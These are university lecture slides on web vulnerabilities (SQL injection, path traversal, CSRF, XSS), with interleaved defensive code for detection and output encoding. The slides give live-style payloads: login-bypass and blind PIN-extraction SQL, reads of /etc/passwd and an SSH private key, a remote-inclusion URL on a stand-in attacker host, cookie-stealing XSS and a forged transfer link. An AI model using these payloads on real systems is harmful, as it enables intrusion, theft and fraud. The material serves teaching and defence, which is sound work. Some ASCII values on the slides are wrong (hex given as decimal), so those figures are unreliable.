4MMSR-3 web vulnerabilities-lecturer

  1. 4MMSR - Information Systems Security, 3 - Web vulnerabilities and attacks. Fabien Duchene (@fabien duchene) [Lecturer version]. Laboratoire d'Informatique de Grenoble, VASCO team, Grenoble Institute of Technology - Grenoble INP Ensimag, firstname.name@imag.fr, 2011-2012. Fabien Duchene (LIG), 4MMSR-3-Web vulnerabilities and attacks, 2011-2012, slide 1/86
  2. Outline. 1 Injection: Introduction; Web Application: definition. 2 Some web injection vulnerabilities: SQL Injection; Path Traversal; CSRF; XSS - Cross-Site scripting.
  3. Section 1: Injection.
  4. Injection I. Intuitive definition: exploitation of a vulnerability that permits injecting data and/or code on the target. [Kunz 2011]
  5. Injection II. Threat level [OWASP 2011]: Exploitability +++ (EASY); Prevalence ++ (COMMON); Detectability ++ (AVERAGE); Impact +++ (SEVERE).
  7. Some injection vulnerabilities. An attacker's goal: run code he controls on the subsystem.
     vulnerability                  | targeted subsystem               | what is injected               | impact
     Buffer Overflow, Format String | in-memory executable             | assembly data and instructions | code execution => integrity, confidentiality, availability of data
     SQL Injection                  | database                         | SQL data and commands          | code execution => integrity, confidentiality, availability of data
     XSS                            | web application (client browser) | HTML / JS / Java / ... code    | code execution => integrity, confidentiality, availability of data
     Path Traversal                 | reading, writing, deleting files | file name                      | integrity, confidentiality, availability of files
     (Some) causes: non sufficiently sanitized inputs; insecure use of input parameters.
  8. Web application: intuitive definition I (figure).
  9. Web application: intuitive definition II. Inputs: HTTP request headers, names and values.
  10. Web application: intuitive definition III. Outputs: HTTP response headers, HTTP response body, ...
  11. Web application: formal definition I [Fabien Duchene 2012]. Let Σ be an alphabet. A transition u of a web application is a mapping from n user inputs i_l^u ∈ Σ*, I_u = (i_1^u, ..., i_n^u), to an output q^u = q_1^u · q_2^u · ... · q_k^u, q^u ∈ Σ*. Each q_j^u is either a webserver-filtered input parameter i_l^u, i.e. ∃ f_r ∈ Filters, q_j^u = f_r(i_l^u), or a string q_h^u surrounding one or two q_j^u. q^u is (in many cases) generated by G_O, the output grammar (eg: HTML). An input sequence is I = (I_1, ..., I_m) where each I_u adheres to the above definition. Filters is a finite set of functions from Σ* → Σ* such as PHP addslashes().
  12. Web application: formal definition II. A web application is modeled as an Input Output Labelled Transition System, in which each transition u conforms to the above definition.
  13. Section 2: Some web injection vulnerabilities.
  14. SQL Injection Attack (SQLi) I. Code injection at the database layer of an application. Subsystem: SQL database. Goal: read or alter (modify or delete) data. Impact: integrity, confidentiality, availability of data (see the table on slide 7).
  15. SQL injection: schema. SQLi, a method:
      0. Have a goal: what do you aim to do? eg: steal and delete all customer data?
      LOOP:
      1.1 Gain knowledge: "how easy" can we inject? Do we have a helpful error message?
      1.2 Try the most interesting ones of the applicable exploitation methods (wrt the current database knowledge).
  16. SQLi: basic - "Incorrect type handling" I. Incorrect type handling: data is not strongly typed; in the example, an integer is expected, but the language interpreter evaluates the whole expression [1]:
      statement := "SELECT * FROM weather_data WHERE station=" + a_variable + ";"
      [1] Example: webgoat SQLi
  17. SQLi: basic - "Incorrect type handling" II. Basic form. We submit it once and observe: once we submit, the station parameter seems to be used in the data retrieval. Goal: extract all the data from that database table.
  18. SQLi: basic - "Incorrect type handling" III. Have a look at the source code, and observe the parameter name. Since it is simpler to perform the request by HTTP GET, give it a try.
  19. SQLi: basic - "Incorrect type handling" IV. It works: the station parameter sent via a GET request is used by the web application. Let us try to inject: write a query so that it will always be evaluated to TRUE.
  20. SQLi: basic - "Incorrect type handling" V. Exploitation succeeds: we are able to extract all the records from that table.
  21. SQLi: basic - "Incorrect type handling" VI. Also works if we use HTTP POST, here with Firefox Hackbar [2]. Note: we only tried to get the data, but think about [3]:
      station=103 OR 1=1 ; DROP table weather_data
      [1] [Webgoat - numeric SQL injection]
      [2] [Firefox hackbar add-on]
      [3] Most SQL server implementations allow multiple statements. APIs generally do not: PHP mysql_query() and Python sqlite3 [...].execute() do not support this. Some functions, such as Python sqlite3 [...].executescript(), however do.
  23. SQLi: basic - "Incorrectly filtered escape characters" I. Incorrect type handling: user input is not filtered for escape characters (eg: ' " ..); parameters are passed without using prepared statements:
      statement = "SELECT * FROM users WHERE name = '" + userName + "';"
      How would you set the variable userName to bypass the authentication? A possible answer: ' or 'trueblood'='trueblood
  25. SQLi: basic - "Incorrectly filtered escape characters" II.
      statement = "SELECT * FROM users WHERE name = '" + userName + "'; UPDATE logon_attempts SET attempts=attempts+1 WHERE name='" + userName + "';"
      How do we prevent the logon attempt counter from increasing for that username? A possible answer: escape the second query thanks to SQL comments: mario ; --
  26. A formal definition of an SQL injection I [Wassermann 2008]. Syntactic confinement. Given a context-free grammar G = (V, Σ, S, R) with nonterminals V, terminals Σ, a start symbol S and production rules R. Let ⇒_G denote "derives in one step", s.t. if α, β ∈ (Σ ∪ V)* and A → γ ∈ R then αAβ ⇒_G αγβ. Let ⇒*_G be the reflexive transitive closure of ⇒_G. Also, given a string σ = σ1 σ2 σ3 ∈ Σ*, σ2 is syntactically confined in σ iff there exists a sentential form σ1 X σ3 s.t. X ∈ (V ∪ Σ) and S ⇒*_G σ1 X σ3 ⇒*_G σ1 σ2 σ3.
  27. A formal definition of an SQL injection II. Sufficient condition for an SQL injection: G_O, the output grammar, is the SQL grammar. For a given e, I_e = (i_1^e, i_2^e, ..., i_n^e), let the corresponding output be q^e = q_1^e + q_2^e + ... + q_k^e. If ∃ a q_j^e in q^e s.t. q_j^e is not syntactically confined in q^e, then I_e is a SQL injection attack.
  28. A formal definition of an SQL injection III. For input parameter 2, no production rule could generate only the tainted output 2 OR 1 = 1.
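The confinement test of slides 26-28 can be run mechanically. The following is an added illustration (not Wassermann's algorithm nor the lecture's code) that simplifies the definition to the token level: an input is treated as confined if the span it occupies in the generated query is covered by exactly one SQL token; the templates and input values are the ones from the slides.

```python
import re

# Simplified, token-level version of syntactic confinement (added illustration):
# an input value is "confined" if the span it lands on in the generated query is
# covered by exactly one SQL token (one literal or identifier). Covering several
# tokens, or cutting a token in half, means the input changed the parse structure.
TOKEN_RE = re.compile(
    r"""'(?:[^']|'')*'          # single-quoted string literal, '' escapes a quote
      | \d+                     # integer literal
      | [A-Za-z_][A-Za-z0-9_]*  # identifier or keyword
      | <=|>=|<>|!=|--          # two-character operators / comment start
      | [^\s]                   # any other single character (punctuation)
    """,
    re.VERBOSE,
)


def tokenize(sql):
    """Return the (start, end) character spans of the tokens in `sql`."""
    return [(m.start(), m.end()) for m in TOKEN_RE.finditer(sql)]


def build_query(template, value):
    """Paste the untrusted value into the template and remember where it landed."""
    start = template.index("{}")
    query = template.replace("{}", value, 1)
    return query, (start, start + len(value))


def is_confined(query, span):
    """True iff the tainted span sits inside a single SQL token."""
    t_start, t_end = span
    covering = [(s, e) for s, e in tokenize(query) if s < t_end and e > t_start]
    if len(covering) != 1:
        return False                      # several tokens: the structure changed
    s, e = covering[0]
    return s <= t_start and t_end <= e    # fully inside one token


def classify(template, value):
    """Label one (template, input) pair the way slide 27's condition does."""
    query, span = build_query(template, value)
    return "confined" if is_confined(query, span) else "SQL injection"


if __name__ == "__main__":
    numeric = "SELECT * FROM weather_data WHERE station={}"     # slide 16
    string = "SELECT * FROM users WHERE name = '{}'"            # slide 23
    for tpl, val in [(numeric, "103"), (numeric, "103 OR 1=1"),
                     (string, "O''Brien"), (string, "' or 'trueblood'='trueblood")]:
        print(f"{val!r:40} -> {classify(tpl, val)}")
```

A properly escaped quote (O''Brien) stays inside one string token and is accepted, while the slide's inputs span five tokens and are flagged.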
  29. "Blind" SQLi I. Blind SQL injection? Production environments do not let you see the error outputs; trying to inject in such a system is "blind injection". More injection techniques on [Hackipedia - SQL injection]. Example [4]: webgoat blind integer SQLIA. Assume a simple SELECT ... WHERE request such as:
  30. "Blind" SQLi II.
      SELECT `field_name` FROM `table_name` WHERE `field1`='arg1'
      If we try a random number: (figure). If we try to input a non-integer: generic error message (no "straightforward" information disclosure).
  31. "Blind" SQLi III. Is the application susceptible to blind injection? Yes! Does such a record exist?
      101 AND (SELECT COUNT(*) FROM pins WHERE cc_number=1111222233334444)>=1
  32. "Blind" SQLi IV. Now let us explore the possible space via dichotomy:
      101 AND (SELECT pin FROM pins WHERE cc_number=1111222233334444)<POWER(2,31)
      ... POWER(2,30) ... POWER(2,11): the first one (descending order) for which the condition is evaluated to false.
  33. "Blind" SQLi V. Thus the value is between 2^11 = 2048 and 2^12 = 4096 (strictly). Now let us continue the dichotomy: still too high... now too low... We iterate that process, and finally:
  34. "Blind" SQLi VI.
      101 AND (SELECT pin FROM pins WHERE cc_number=1111222233334444) <(POWER(2,11)+POWER(2,8)+POWER(2,5)+POWER(2,4)+POWER(2,3)+POWER(2,2)+POWER(2,0))
      2^11 + 2^8 + 2^5 + 2^4 + 2^3 + 2^2 + 2^0 = 2365. Let us verify one last time that the value is 2364.
  35. "Blind" SQLi VII. Blind string SQL Injection Attack [5]. Similar: character-per-character discovery by using the SQL functions CHAR(x) (x: integer; ex in ASCII encoding: CHAR(41)='A'; CHAR(61)='a'), ASCII(c) (c: character; eg: ASCII('a')=61) and SUBSTRING(str,start,length). Encoding-dependent: ASCII, UTF8, UTF16... Heuristic: would promote characters of the assumed alphabet.
      [4] [Webgoat - numeric SQL injection]
      [5] [Mavituna - SQL injection sheet 2007]
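The blind probing of slides 31-35 leaves a recognisable trace in web-server logs: a subquery glued to a parameter with AND/OR, the POWER/ASCII/SUBSTRING helpers, and a burst of near-identical requests that differ only in a numeric literal. The detector below is an added example (not from the lecture or WebGoat); the log lines are constructed and replay the probe strings from the slides.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (not from the lecture): one client probing the
# station parameter the way the "blind SQLi" slides describe, one normal client.
SAMPLE_LOG = """\
10.0.0.7 - - [12/Mar/2012:10:01:02 +0100] "GET /weather?station=101 HTTP/1.1" 200 512
10.0.0.7 - - [12/Mar/2012:10:01:05 +0100] "GET /weather?station=101+AND+(SELECT+COUNT(*)+FROM+pins+WHERE+cc_number=1111222233334444)>=1 HTTP/1.1" 200 512
10.0.0.7 - - [12/Mar/2012:10:01:07 +0100] "GET /weather?station=101+AND+(SELECT+pin+FROM+pins+WHERE+cc_number=1111222233334444)<POWER(2,31) HTTP/1.1" 200 512
10.0.0.7 - - [12/Mar/2012:10:01:08 +0100] "GET /weather?station=101+AND+(SELECT+pin+FROM+pins+WHERE+cc_number=1111222233334444)<POWER(2,30) HTTP/1.1" 200 512
10.0.0.7 - - [12/Mar/2012:10:01:09 +0100] "GET /weather?station=101+AND+(SELECT+pin+FROM+pins+WHERE+cc_number=1111222233334444)<POWER(2,11) HTTP/1.1" 200 81
10.0.0.9 - - [12/Mar/2012:10:02:00 +0100] "GET /weather?station=102 HTTP/1.1" 200 498
10.0.0.9 - - [12/Mar/2012:10:02:30 +0100] "GET /search?q=ascii+art+power+tools HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)

# SQL inference constructs used on the slides: a boolean condition on a subquery,
# the classic OR n=n tautology, the POWER/ASCII/SUBSTRING/CHAR helpers of blind
# integer and string injection, and a trailing comment or statement separator.
SQLI_PATTERNS = [
    re.compile(r"\b(AND|OR)\b\s*\(?\s*SELECT\b", re.I),
    re.compile(r"\b(AND|OR)\b\s+\d+\s*=\s*\d+", re.I),
    re.compile(r"\b(POWER|ASCII|SUBSTRING|CHAR)\s*\(", re.I),
    re.compile(r"(--|;)\s*$"),
]


def parse_line(line):
    """Split one combined-format log line into client, path and decoded parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    # parse_qsl splits each pair at its first '=', so '>=1' inside a value survives,
    # and it decodes '+' and %xx for us.
    params = parse_qsl(url.query, keep_blank_values=True)
    return {"ip": m.group("ip"), "path": url.path, "params": params}


def sqli_hits(value):
    """Patterns matched by one decoded parameter value (empty list = clean)."""
    return [p.pattern for p in SQLI_PATTERNS if p.search(value)]


def analyze(log_text, burst_threshold=3):
    """Return per-request pattern hits and per-client 'dichotomy' bursts:
    >= burst_threshold requests where the same parameter differs only in
    numeric literals, which is what the binary search on slides 32-34 looks like."""
    flagged = []
    templates = Counter()
    for line in log_text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        for name, value in req["params"]:
            hits = sqli_hits(value)
            if hits:
                flagged.append((req["ip"], req["path"], name, value))
            # numeric literals -> '#', so POWER(2,31) and POWER(2,30) collide
            key = (req["ip"], req["path"], name, re.sub(r"\d+", "#", value))
            templates[key] += 1
    bursts = {key: n for key, n in templates.items() if n >= burst_threshold}
    return {"flagged": flagged, "bursts": bursts}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for ip, path, name, value in result["flagged"]:
        print(f"{ip} {path} {name}={value!r}")
    for (ip, path, name, template), n in result["bursts"].items():
        print(f"burst: {n} requests from {ip} on {path}?{name}={template!r}")
```

The "ascii art power tools" search is not flagged because the function patterns require an opening parenthesis; tune the burst threshold to the volume of the application being monitored.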
  37. SQLi blind string injection: exercise. We want to find the first character of the field user_name of the table users, of the record with user_id equal to 6969, thanks to the following SQL request (we are able to manipulate $bet_id, and we know that bet_id = 3679 is a valid ID):
      'SELECT MAX(`bet_amount`) FROM `bets` WHERE `bet_id`=' + $bet_id + ';'
      A possible answer, initialization:
      3679' AND (ASCII(SELECT SUBSTRING(user_name,0,1) WHERE user_id=6969) > ((ASCII('z')-ASCII('A'))/2) ; --
  38. SQLi prevention I. Input sanitization: only allow some characters, or explicitly deny some that have a meaning [6]. Strongly type the parameters. Use parameterized statements. Java:
      java.sql.PreparedStatement prep = connection.prepareStatement("SELECT * FROM users WHERE LASTNAME = ? AND AGE = ?");
      prep.setString(1, lastname);
      prep.setInt(2, age);
      prep.executeQuery();
      [6] problem: might be encoding dependent (eg: UTF-8, UTF-16)
  39. SQLi prevention II. PHP:
      $ps = $db->prepare('SELECT pasta, flavor, quantity, order_day ' .
                         'FROM orders WHERE user_id=? AND order_month=?');
      $ps->execute(array($current_user_id, $month));
  40. Path Traversal, aka "../" (dot-dot-slash) vulnerability: performing operations (read, execute, write) on files or folders that the web application developer(s) did not conceive the application for. Impact: security properties. "LFI": Local File Inclusion; "RFI": Remote File Inclusion.
  41. Path Traversal: schema I (figure).
  42. Path Traversal: schema II. A method: 1. Observe the inputs' dependencies regarding which file an action is performed on (and possibly which action). 2. Craft those inputs to perform the desired action(s) on the desired file(s).
  43. Path Traversal, example I (1-files/file-include.php):
      <?php
      $color = 'blue';
      if (isset($_GET['LANGUAGE']))
          $language = $_GET['LANGUAGE'];
      include($language . '.php');
      ?>
      <form method="get">
        <select name="LANGUAGE">
          <option value="english">english</option>
          <option value="chinese">chinese</option>
        </select>
        <input type="submit">
      </form>
  45. Path vulnerability example. How would you perform an HTTP GET request in order to list the content of the /etc/passwd file? LFI. A possible answer: ?LANGUAGE=/etc/passwd%00. Run code from a remote file? RFI. A possible answer: ?LANGUAGE='http://evilwebsite.ext/evilscript.ext%00
  47. Path Traversal, example II. Consider a similar PHP code, replacing the include line:
      ...
      include("/home/webapp1/public_html/code/languages/" . $language);
      ...
      How would you read the RSA SSH private key (~/.ssh/id_rsa) of the user orlando (/home/orlando)? Directory traversal. A possible answer: ../../../../orlando/.ssh/id_rsa
  48. Path traversal - countermeasures. (Once more) input sanitization. Limit file inclusion to a selected subset of directories; this can be done at several layers: interpreter (eg: PHP (allow_url_fopen, allow_url_include), ASP.Net); web-server configuration (eg: Apache httpd); chroot jails or similar systems (child processes will only be able to open files within the defined chroot jail). Enforce strict ACLs on sensitive files, and run websites under a different identity than the owner(s) of those sensitive files.
[43/86] CSRF I

Cross Site Request Forgery: main objective
- the attacker tricks a victim into loading a webpage on a legitimate website
- by loading that webpage, the victim performs the action planned by the attacker

Causes
- the web application is not able to distinguish between an automatic action and a user-driven one

[44/86] CSRF II (figure)

[45/86] CSRF III: detailed steps
1. application logic discovery: the attacker crafts a precise HTTP request (including HTTP headers, GET and/or POST parameters and values) that, if run by another user, will perform the actions the attacker desires
2. the victim first has to be authenticated
3. a malicious message is sent, so that the request is performed automatically when the user reads it (eg: HTML via IM, twitter, email...)
4. the victim runs that code inside his browser, and the actions are performed without him noticing it

[46/86] CSRF example I

Aimelyne wants to trick Ilyas so as to receive 2000 USD from him via the website payme.wtf.

Application logic discovery: A uses payme.wtf for a small amount, 5 USD to Melissa... and discovers that the following request is performed:
    GET http://payme.wtf/transfer.do?to=Melissa&amount=5 HTTP/1.1

[47/86] CSRF example II: malicious link construction

How would A construct a malicious link so that people who perform that request would (if authenticated) send her 2000 USD?
    http://payme.wtf/transfer.do?to=Aimelyne&amount=2000

[48/86] CSRF example III: transmission to the victim

How would A send that link to the victim? A possible answer: email, instant messaging (eg: skype, gchat...)

The victim gets tricked: assuming Ilyas is authenticated, if he clicks the link, Aimelyne will receive the money.

What is the problem that could now occur? Answer: Ilyas could notice that he just performed an action.

How to prevent that? A solution: force the HTTP GET request to be performed so that the user does not notice it. eg: a very small iframe, img, script, css, flash... basically anything a browser can load! (7)

(7) We here assumed a GET request. POST requests could also be tricked (eg: HTML form, input submission triggered via javascript).

[49/86] CSRF countermeasures

client side:
- let the user decide whether to perform a cross-site request [RequestPolicy firefox add-on], [CsFire firefox add-on]
- prevention of redirections [Ryck et al. 2011]

server side:
- for each form request, include a "fresh state token" (the request is not accepted in case of a replay attack)
  - freshness requires sufficient randomization, eg. dependencies: user identity, session, time, webpage from which the request comes, form "status"
  - ASP.Net: viewstate
  - Java: nothing out of the box, but the ability to build it. OWASP CSRFGuard
- checking the HTTP referer header: from which webpage does the request come? Is it the very same website, or at least one that I do trust?
- limiting the lifetime of tickets (eg: cookies)
[50/86] XSS - Cross-Site scripting: X whaaat? I

XSS (aka Cross Site Scripting) is a code injection vulnerability within web applications. Exploiting it allows an attacker to inject code (eg: html, javascript, flash...) and to run it in the visitor context (victim's browser) in order to bypass access control mechanisms (eg: Same-Origin Policy).

"Cross-site": code from another source is run on the attacked website.

12,885 XSS vulnerabilities reported in 2008 (8)

XSS starts with an X because... not to be confused with CSS.

XSS...
- is executed on the client
- targets client-side data, eg: session cookies
- control

[51/86] X whaaat? II

How do attackers have fun?
- silently install malware in your browser
- steal your session credentials (eg: cookies)
- use your browser as part of a botnet
http only: http://fd.the-wildcat.de/apache_e36a9cf46c.php

Same origin policy
- security boundary based on the very same (fqdn, port, and protocol)
- only the very same "entity" can access, for instance, user credentials
- eg (each of these is a distinct origin):
    https://ocarina.imag.fr/page1.py
    http://ocarina.imag.fr/page3.html
    http://ocarina.imag.fr:82/page5.php

[52/86] X whaaat? III

Causes
- HTML mixes content, control statements and formatting
- cross-site requests are allowed by default

(8) [Symantec 2009] Symantec Global Internet Security Threat Report - trends for 2008

[53/86] Where can it be found? I
- any website processing arguments (HTTP GET, POST ...)
- mail.google.com [Amit 2010] Cross-Site Scripting through Flash in Gmail Based Services

[54/86] Where can it be found? II
- m.facebook.com [CrazyDaVinci 2011] Autopost Spamming using Facebook Mobile XSS

[55/86] XSS classification

According to the minimal number of executed transitions (a transition being a couple of SUT request + answer):
- type 0 XSS
- type 1 XSS / reflected / non-persistent
- type 2 XSS / stored / persistent
[56/86] Reflected XSS / type 1 attack (figure) (9)

(9) [IBM 2002] Cross-site scripting

[57/86] Reflected XSS aka non-persistent / type 1
- "easy" to trigger
- the most found in terms of number of vulnerabilities
- different from CSRF! why? .. code execution on the client side!

[58/86] Reflected XSS - example I: web application: online shop (figure)

[59/86] Reflected XSS - example II: after submitting the form (figure)

[60/86] Reflected XSS - example III: observe the HTTP request parameters: what are their names and their assumed types? (figure)

[61/86] Reflected XSS - example III (cont.)

attempt to inject in QTY1:
    QTY1=1a<img src=mario.gif onerror=alert(1)>
try to inject another field, eg: field1

[62/86] Reflected XSS - example III (cont.)

    QTY1=1a<img src=mario.gif onerror=alert(1)>&QTY2=1&QTY3=1&QTY4=1&field2=4128+3214+0002+1999&field1=111<img src=mario.gif onerror=alert(document.cookie)>&SUBMIT=Purchase

success! we are able to inject some code!
- here, we showed that we can steal the victim's cookies
- we can transfer the crafted URL to the victim via: twitter, IM, email... (even shorten it, eg: bit.ly)

[63/86] Type 1 XSS: a formal definition I [Fabien Duchene 2012]

Let q be the following extract of the SUT output:
    <a name="[USER INFLUENCED INPUT]">Hola!</a>

q = q1 + q2 + q3
G0: the HTML grammar (which grammar actually depends on WHERE we can inject: JS, Flash..)

[64/86] Type 1 XSS: a formal definition II

Extract of the parse tree T_G0 of the SUT output (figure): under the start tag `<a`, an attribute node A_ATTR_NAME with value "kalimu", followed (A_LEFT) by a second attribute node A_ATTR onclick / A_ATTR_ONC with value "alert(1)", then `>`.
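The parse-tree view of the definition made concrete, as an added example that is not part of the lecture, and also the output-filtering countermeasure the deck lists later: q1 and q3 are the fixed parts of `<a name="[USER INFLUENCED INPUT]">Hola!</a>`, q2 is user influenced, and a small start-tag scanner plays the role of the parser producing T_G0. Rendering the input raw yields a second attribute node (onclick) that the intended tree never had; encoding it for the attribute-value context keeps the whole input inside the single `name` node. The scanner and encoder are this example's own, not a real HTML parser, and the sample value `kalimu" onclick="alert(1)` is the one the slide's tree depicts.

```javascript
'use strict';
// Added example (not from the lecture): makes the parse-tree definition
// concrete. Template taken from the slides; scanner and encoder are this
// example's own and handle only a single start tag.

// q1 and q3 are fixed by the application; q2 is user influenced.
const Q1 = '<a name="';
const Q3 = '">Hola!</a>';

// Output filter for the attribute-value context: every character that
// could close the quoted value or open a tag becomes an entity.
function encodeForAttribute(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// q = q1 + encode(q2) + q3; the default "encoder" is the identity, i.e. no filter.
function renderAnchor(userInput, encode = s => s) {
  return Q1 + encode(userInput) + Q3;
}

// Minimal scanner for one start tag: returns the tag name and its attribute
// nodes, i.e. the top of T_G0 for the output. Quoted values end at the
// matching quote, unquoted ones at whitespace or '>'.
function parseStartTag(html) {
  if (html[0] !== '<') throw new Error('expected a start tag');
  let i = 1;
  const isSpace = c => /\s/.test(c);
  const readName = () => {
    const start = i;
    while (i < html.length && !/[\s\/>=]/.test(html[i])) i++;
    return html.slice(start, i);
  };
  const tag = readName().toLowerCase();
  const attrs = [];
  while (i < html.length) {
    while (i < html.length && isSpace(html[i])) i++;
    if (i >= html.length || html[i] === '>') break;
    if (html[i] === '/') { i++; continue; }
    const name = readName();
    if (!name) { i++; continue; }            // stray '=' with no name: skip it
    let value = null;
    while (i < html.length && isSpace(html[i])) i++;
    if (html[i] === '=') {
      i++;
      while (i < html.length && isSpace(html[i])) i++;
      const quote = html[i];
      if (quote === '"' || quote === "'") {
        let end = html.indexOf(quote, i + 1);
        if (end < 0) end = html.length;
        value = html.slice(i + 1, end);
        i = end + 1;
      } else {
        const start = i;
        while (i < html.length && !/[\s>]/.test(html[i])) i++;
        value = html.slice(start, i);
      }
    }
    attrs.push({ name: name.toLowerCase(), value });
  }
  return { tag, attrs };
}

// Type 1 XSS in this template: the user data has produced a node that was
// not in the intended tree, here an event-handler attribute.
function introducesEventHandler(html) {
  return parseStartTag(html).attrs.some(a => a.name.startsWith('on'));
}
```

The check is context specific: the same encoder would be wrong inside a `<script>` block or a URL attribute, which is why the slide notes that G0 depends on where the input lands.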
[65/86] Stored XSS / type 2 attack I (figure) (10)

(10) [IBM 2002] Cross-site scripting

[66/86] Stored XSS
- interesting for browser worms
- impact more important (eg: Facebook wall)
- in brief: data stored on the server and displayed with only the victim's interaction

[67/86] Stored XSS - example I: [WebGoat - the vulnerable web application] (figure)

[68/86] Stored XSS - example II: login form (figure)

[69/86] Stored XSS - example III: profile visualization (figure)

[70/86] Stored XSS example: profile edition. Any idea? (figure)

[71/86] Stored XSS example I: now let us log on as Jerry (figure)

[72/86] Stored XSS example II: and check Tom's profile (figure)

[73/86] Stored XSS example III: P0wN3d! (figure)
[74/86] DOM based XSS / type 0 attack I

The web-server does not receive the payload anymore.

[75/86] DOM based XSS / type 0 attack II: DOM XSS steps
1. searching for a valid URL on the website
2. searching for ways to run code within the browser from a URL load request, without sending it to the server
3. sending the malicious URL to the victim
4. the browser loads the legitimate webpage
5. and runs the payload (without anything noticeable on the server side)

[76/86] DOM based XSS / type 0 attack III: causes [Paola 2011]
- sources: input data controlled, directly or not, by the attacker
- sinks: potentially dangerous functions
- filters: operations on sources which change the content
- badly designed client filters
- focus on server-side XSS detection, while this is a client problem

[77/86] Document Object Model

DOM? a tree permitting programmatic access to the objects that are represented on a rendered webpage (11)

(11) [Document Object Model] Document Object Model

[78/86] DOM XSS example I

Classic example from the original DOM-XSS paper [Klein 2005] "DOM Based Cross Site Scripting or XSS of the Third Kind"

http://www.vulnerable.site/welcome.html

    <HTML>
    <TITLE>Welcome!</TITLE>
    Hi
    <SCRIPT>
    var pos=document.URL.indexOf("name=")+5;
    document.write(document.URL.substring(pos,document.URL.length));
    </SCRIPT>
    <BR>
    Welcome to our system
    ...
    </HTML>

[79/86] DOM XSS example II

normal usage: http://www.vulnerable.site/welcome.html?name=Sophie

malicious crafted link:
    http://www.vulnerable.site/welcome.html?name=Sophie#blabla<script>alert(document.cookie);</script>

... there is a lot of trickier stuff!
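The source/sink reading of Klein's welcome.html from the two slides above, as an added example that is not part of the lecture: `vulnerableName` mirrors the page's indexOf/substring logic on document.URL (the source), which is why everything after `#` reaches document.write (the sink) without the server ever seeing it; `safeName` reads the parameter with a real URL parser, which separates query from fragment, and the value is then rendered as text rather than markup. Runs under Node.js for checking; the element id `greeting` in the browser usage comment is this example's own assumption.

```javascript
'use strict';
// Added example (not from the lecture): source/sink view of Klein's
// welcome.html. `vulnerableName` reproduces the page's logic for comparison;
// the other functions are the hardened counterpart. Element id is hypothetical.

// What the original script does: slice document.URL after "name=". Since
// document.URL keeps the fragment, everything after '#' flows into the sink.
function vulnerableName(documentUrl) {
  const pos = documentUrl.indexOf('name=') + 5;
  return documentUrl.substring(pos, documentUrl.length);
}

// Safe source handling: the URL parser drops the fragment from the query,
// and the parameter is read by name rather than by string position.
function safeName(documentUrl) {
  const url = new URL(documentUrl);
  return url.searchParams.get('name') || '';
}

// Text-context filter, for the case where the value must be inlined as HTML.
function encodeForText(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;' };
  return String(s).replace(/[&<>]/g, c => map[c]);
}

// The markup that a textContent assignment amounts to. In the browser the
// safe sink is the text node itself:
//   document.getElementById('greeting').textContent = 'Hi ' + safeName(location.href);
function greetingMarkup(documentUrl) {
  return 'Hi ' + encodeForText(safeName(documentUrl));
}
```

The two changes are independent and both matter: parsing the source properly stops the fragment trick, and using a text sink (or encoding for the text context) stops a payload that arrives in the query string, which the server could at least have observed but a client-side script still must not execute.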
[80/86] XSS counter-measures I

Input sanitization
- client side: letting the user decide whether to run anything else than HTML, eg: [NoScript]
- server side: "proxy/stub" between the http server and the clients
  - filtering: only allow a subset of characters
  - input and output filtering [HTMLPurifier], [AntiSamy project]...

[81/86] XSS counter-measures II
- both: httpOnly [httponly] (on most modern browsers: not possible with document.cookie and XMLHTTPResponse, but still vulnerable if using XMLHTTPRequest)
- Stored: offline search in databases: fastidious (encoding, patterns), response time?
- DOM: Frozen-DOM [0x6D6172696F 2011], X-Content-Security-Policy [Paola 2011]
[82/86] Appendix: For Further Reading

0x6D6172696F, Mario Heiderich (2011). Locking the Throne Room - ECMA Script 5, a frozen DOM and the eradicati. http://www.hackinparis.com/slides/hip2k11/02-LockingTheThroneRoom.pdf, http://mario.heideri.ch.
Amit, Yair (2010). Cross-Site Scripting through Flash in Gmail Based Services. http://blog.watchfire.com/wfblog/2010/03/cross-site-scripting-through-flash-in-gmail-based-services.html.
CrazyDaVinci (2011). Autopost Spamming using Facebook Mobile XSS. http://crazydavinci.net/2011/03/autopost-spamming-using-facebook-mobile-xss/.
Fabien Duchene, Roland Groz, Sanjay Rawat, Jean-Luc Richier (2012). XSS Vulnerability Detection Using Model Inference Assisted Evolutionary Fuz.
Hackipedia - SQL injection. http://hakipedia.com/index.php/SQL_Injection.
Heiderich, Mario. HTML5 security. http://html5sec.org/.

[83/86] Appendix: For Further Reading

IBM, Paul Lee (2002). Cross-site scripting. https://www.ibm.com/developerworks/tivoli/library/s-csscript/.
Johan Adriaans, Pedro Laguna. Firefox hackbar add-on. https://addons.mozilla.org/en-US/firefox/addon/hackbar/.
Klein, Amit (2005). "DOM Based Cross Site Scripting or XSS of the Third Kind". In: http://www.webappsec.org/projects/articles/071105.shtml.
Kunz, Benjamin (2011). Skype Vulnerabilities: Zero Day Exploitation 2011, HITBSecConf 2011 (Mala. http://conference.hitb.org/hitbsecconf2011kul/?page_id=1757.
Maone, Giorgio. NoScript. https://addons.mozilla.org/en-US/firefox/addon/noscript/.
Mavituna - SQL injection sheet (2007). http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/.
OWASP. AntiSamy project. https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project.
OWASP. httponly. https://www.owasp.org/index.php/HTTPOnly.

[84/86] Appendix: For Further Reading

OWASP. WebGoat - the vulnerable web application. https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project.
OWASP (2011). Injection - OWASP top 10 - 2010. https://www.owasp.org/index.php/Top_10_2010-A1.
Paola, Stefano Di (2011). DOM Xss Identification and Exploitation. http://media.hacking-lab.com/scs3/scs3_pdf/SCS3_2011_Di_Paola.pdf.
Philippe De Ryck, Lieven Desmet. CsFire firefox add-on. https://addons.mozilla.org/en-US/firefox/addon/csfire/.
RSnake. XSS. http://ha.ckers.org/xss.html.
